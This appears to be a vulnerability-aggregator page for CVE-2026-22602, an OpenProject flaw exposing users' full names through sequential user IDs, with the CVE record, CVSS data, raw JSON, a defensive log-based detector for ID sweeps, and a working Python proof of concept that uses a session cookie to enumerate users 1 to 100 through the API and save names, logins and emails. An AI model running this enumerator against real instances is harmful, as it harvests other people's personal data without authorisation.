Security Vulnerability Report
CVE-2026-22602 CVSS 3.5 LOW

CVE-2026-22602

Published: 2026-01-10 02:15:49
Last Modified: 2026-01-14 22:26:19

Description

OpenProject is an open-source, web-based project management software. Prior to version 16.6.2, a low-privileged logged-in user can view the full names of other users. Since user IDs are assigned sequentially and predictably (e.g., 1 to 1000), an attacker can extract a complete list of all users' full names by iterating through the per-user profile URLs. The same behavior can also be reproduced via the OpenProject API, allowing automated retrieval of full names through the API as well. This issue has been patched in version 16.6.2. Those who are unable to upgrade may apply the patch manually.
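A defender-side complement to the description above, added here and not part of the CVE record or of the OpenProject project: detection logic that flags a client that fetches many distinct user IDs from the profile or API endpoints within a short window, which is the access-log signature of the sequential-ID sweep the advisory describes. The combined-format log lines are constructed for illustration, and the path patterns, client-IP keying, threshold and window are assumptions a deployment would tune.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta, timezone

# Combined-format access log line (assumed layout; fields beyond status are ignored).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Both the HTML profile page (/users/<id>) and the API (/api/v3/users/<id>) return the name.
USER_PATH_RE = re.compile(r'^/(?:api/v3/)?users/(?P<uid>\d+)(?:[/?].*)?$')


def parse_line(line):
    """Parse one access log line; return None if it is malformed or not a user-resource request."""
    m = LOG_RE.match(line)
    if not m:
        return None
    p = USER_PATH_RE.match(m['path'])
    if not p:
        return None
    ts = datetime.strptime(m['ts'], '%d/%b/%Y:%H:%M:%S %z')
    return {'ip': m['ip'], 'ts': ts, 'uid': int(p['uid']), 'status': int(m['status'])}


def detect_enumeration(lines, threshold=20, window_seconds=60):
    """Return {client_ip: peak_distinct_ids} for clients that successfully requested
    at least `threshold` distinct user IDs inside any span of `window_seconds`."""
    by_ip = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev and ev['status'] == 200:          # only successful disclosures count
            by_ip[ev['ip']].append((ev['ts'], ev['uid']))

    flagged = {}
    window = timedelta(seconds=window_seconds)
    for ip, events in by_ip.items():
        events.sort()                           # sliding window needs time order
        in_window = Counter()                   # uid -> hits currently inside the window
        start = 0
        peak = 0
        for ts, uid in events:
            in_window[uid] += 1
            while ts - events[start][0] > window:
                old_uid = events[start][1]
                in_window[old_uid] -= 1
                if in_window[old_uid] == 0:
                    del in_window[old_uid]
                start += 1
            peak = max(peak, len(in_window))    # distinct IDs in the current window
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


def build_sample_log():
    """Constructed access log: one client sweeping user IDs 1..30 in 30 seconds,
    one ordinary client viewing a few pages including a single user profile."""
    base = datetime(2026, 1, 12, 9, 0, 0, tzinfo=timezone.utc)
    fmt = '{ip} - - [{ts}] "GET {path} HTTP/1.1" {status} 512 "-" "python-requests/2.31"'
    lines = []
    for i in range(1, 31):
        ts = (base + timedelta(seconds=i)).strftime('%d/%b/%Y:%H:%M:%S %z')
        lines.append(fmt.format(ip='203.0.113.5', ts=ts, path=f'/api/v3/users/{i}', status=200))
    normal = [('/projects', 200), ('/users/42', 200), ('/api/v3/users/42', 200), ('/work_packages/7', 200)]
    for k, (path, status) in enumerate(normal):
        ts = (base + timedelta(seconds=5 * k)).strftime('%d/%b/%Y:%H:%M:%S %z')
        lines.append(fmt.format(ip='198.51.100.7', ts=ts, path=path, status=status))
    return lines


if __name__ == "__main__":
    for ip, count in detect_enumeration(build_sample_log()).items():
        print(f"possible user enumeration from {ip}: {count} distinct user IDs in one window")
```

The detector keys on client IP because that is what a plain access log offers; where the reverse proxy logs the session or login name, keying on that instead avoids false positives from shared NAT addresses. Counting distinct IDs rather than raw requests is what separates a sweep from a user who reloads one profile repeatedly.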

CVSS Details

CVSS Score
3.5
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:openproject:openproject:*:*:*:*:*:*:*:* - VULNERABLE
OpenProject < 16.6.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-22602 PoC - OpenProject User Information Disclosure
# Author: Security Researcher
# Target: OpenProject < 16.6.2
import requests
import json
import sys
from concurrent.futures import ThreadPoolExecutor, as_completed


def get_user_info(base_url, user_id, session_cookie):
    """Fetch user information by user ID"""
    headers = {
        'Cookie': session_cookie,
        'Accept': 'application/json'
    }
    # Try API endpoint first
    api_url = f"{base_url}/api/v3/users/{user_id}"
    try:
        response = requests.get(api_url, headers=headers, timeout=10)
        if response.status_code == 200:
            data = response.json()
            if 'name' in data:
                return {
                    'id': user_id,
                    'name': data.get('name'),
                    'email': data.get('email', 'N/A'),
                    'login': data.get('login', 'N/A')
                }
    except (requests.RequestException, ValueError):
        # ValueError covers a 200 response whose body is not JSON (e.g. a login page)
        pass
    return None


def main():
    if len(sys.argv) < 3:
        print("Usage: python cve-2026-22602.py <target_url> <session_cookie>")
        print("Example: python cve-2026-22602.py https://openproject.local 'session_id=abc123'")
        sys.exit(1)

    base_url = sys.argv[1].rstrip('/')
    session_cookie = sys.argv[2]

    print(f"[*] Starting enumeration on {base_url}")
    print(f"[*] Target: OpenProject < 16.6.2")
    print(f"[*] Vulnerability: Information Disclosure - User Full Name Disclosure")
    print("-" * 60)

    users = []
    # Enumerate users from ID 1 to 100 (can be extended)
    with ThreadPoolExecutor(max_workers=10) as executor:
        futures = {executor.submit(get_user_info, base_url, uid, session_cookie): uid
                   for uid in range(1, 101)}
        for future in as_completed(futures):
            result = future.result()
            if result:
                users.append(result)
                print(f"[+] Found User ID {result['id']}: {result['name']} ({result['login']})")

    print("-" * 60)
    print(f"[*] Total users enumerated: {len(users)}")

    # Save results
    with open('enumerated_users.json', 'w') as f:
        json.dump(users, f, indent=2)
    print(f"[*] Results saved to enumerated_users.json")


if __name__ == "__main__":
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22602", "sourceIdentifier": "[email protected]", "published": "2026-01-10T02:15:49.057", "lastModified": "2026-01-14T22:26:18.717", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenProject is an open-source, web-based project management software. Prior to version 16.6.2, a low‑privileged logged-in user can view the full names of other users. Since user IDs are assigned sequentially and predictably (e.g., 1 to 1000), an attacker can extract a complete list of all users’ full names by iterating through these URLs. The same behavior can also be reproduced via the OpenProject API, allowing automated retrieval of full names through the API as well. This issue has been patched in version 16.6.2. Those who are unable to upgrade may apply the patch manually."}, {"lang": "es", "value": "OpenProject es un software de gestión de proyectos de código abierto y basado en la web. Antes de la versión 16.6.2, un usuario con pocos privilegios y con sesión iniciada puede ver los nombres completos de otros usuarios. Dado que los ID de usuario se asignan de forma secuencial y predecible (por ejemplo, del 1 al 1000), un atacante puede extraer una lista completa de los nombres completos de todos los usuarios al iterar a través de estas URL. El mismo comportamiento también puede reproducirse a través de la API de OpenProject, permitiendo la recuperación automatizada de nombres completos también a través de la API. Este problema ha sido parcheado en la versión 16.6.2. Aquellos que no puedan actualizar pueden aplicar el parche manualmente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openproject:openproject:*:*:*:*:*:*:*:*", "versionEndExcluding": "16.6.2", "matchCriteriaId": "BF8C07E6-1B04-4E9E-A12C-8CB0A17A95D5"}]}]}], "references": [{"url": "https://github.com/opf/openproject/commit/fb39a779f521d9b08f1e0c9e8aff2b6d4643ea37", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/opf/openproject/pull/21281", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/opf/openproject/releases/tag/v16.6.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/opf/openproject/security/advisories/GHSA-7fvx-9h6h-g82j", "source": "[email protected]", "tags": ["Vendor Advisory", "Patch"]}]}}